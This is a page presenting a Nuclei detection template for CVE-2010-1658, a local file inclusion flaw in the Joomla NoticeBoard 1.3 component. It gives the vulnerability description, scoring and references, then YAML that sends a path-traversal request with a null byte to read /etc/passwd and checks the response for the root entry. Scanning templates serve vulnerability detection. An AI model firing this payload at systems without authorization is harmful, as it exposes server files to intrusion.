Joomla! Component NoticeBoard 1.3 - Local File Inclusion
ID: CVE-2010-1658
Severity: medium
Author: daffainfo
Tags: cve,cve2010,joomla,lfi,edb,code-garage
Description
Section titled “Description”A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-1658
info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. impact: | Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks. remediation: | Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12427 - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 - http://www.vupen.com/english/advisories/2010/1007 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 epss-percentile: 0.87665 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: code-garage product: com_noticeboard tags: cve,cve2010,joomla,lfi,edb,code-garage
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100d35384b317efc9fc1541cfa09e915ba9bbb0eec441c5a13fd9bca1a286e29941022037610a2130c587e06fad358a2bc69588d40e71779391203fa65208e232506fdb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1658.yaml"